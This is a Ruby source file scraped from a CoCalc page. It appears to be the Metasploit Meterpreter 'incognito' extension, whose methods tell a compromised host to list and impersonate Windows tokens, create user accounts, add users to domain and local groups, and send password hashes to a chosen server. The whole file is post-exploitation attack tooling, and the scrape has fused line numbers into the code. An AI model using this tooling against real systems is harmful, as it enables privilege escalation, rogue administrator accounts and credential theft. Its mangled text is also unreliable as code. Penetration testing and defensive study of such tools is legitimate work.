CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
Views: 1904
# -*- coding: binary -*-12require 'rex/post/meterpreter/extensions/incognito/tlv'3require 'rex/post/meterpreter/extensions/incognito/command_ids'45module Rex6module Post7module Meterpreter8module Extensions9module Incognito1011###12#13# This meterpreter extensions a privilege escalation interface that is capable14# of doing things like dumping password hashes and performing local15# exploitation.16#17###18class Incognito < Extension1920def self.extension_id21EXTENSION_ID_INCOGNITO22end2324def initialize(client)25super(client, 'incognito')2627client.register_extension_aliases(28[29{30'name' => 'incognito',31'ext' => self32},33])34end3536def incognito_list_tokens(token_order)37request = Packet.create_request(COMMAND_ID_INCOGNITO_LIST_TOKENS)38request.add_tlv(TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER, token_order)3940response = client.send_request(request)4142{43'delegation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION),44'impersonation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)45}46end4748def incognito_impersonate_token(username)49request = Packet.create_request(COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN)50request.add_tlv(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, username)51response = client.send_request(request)5253response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)54end5556def incognito_add_user(host, username, password)57request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_USER)58request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)59request.add_tlv(TLV_TYPE_INCOGNITO_PASSWORD, password)60request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)61response = client.send_request(request)6263response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)64end6566def incognito_add_group_user(host, groupname, username)67request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_GROUP_USER)68request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)69request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)70request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)71response = client.send_request(request)7273response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)74end7576def incognito_add_localgroup_user(host, groupname, username)77request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER)78request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)79request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)80request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)81response = client.send_request(request)8283response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)84end8586def incognito_snarf_hashes(host)87request = Packet.create_request(COMMAND_ID_INCOGNITO_SNARF_HASHES)88request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)89client.send_request(request)9091true92end9394end9596end; end; end; end; end979899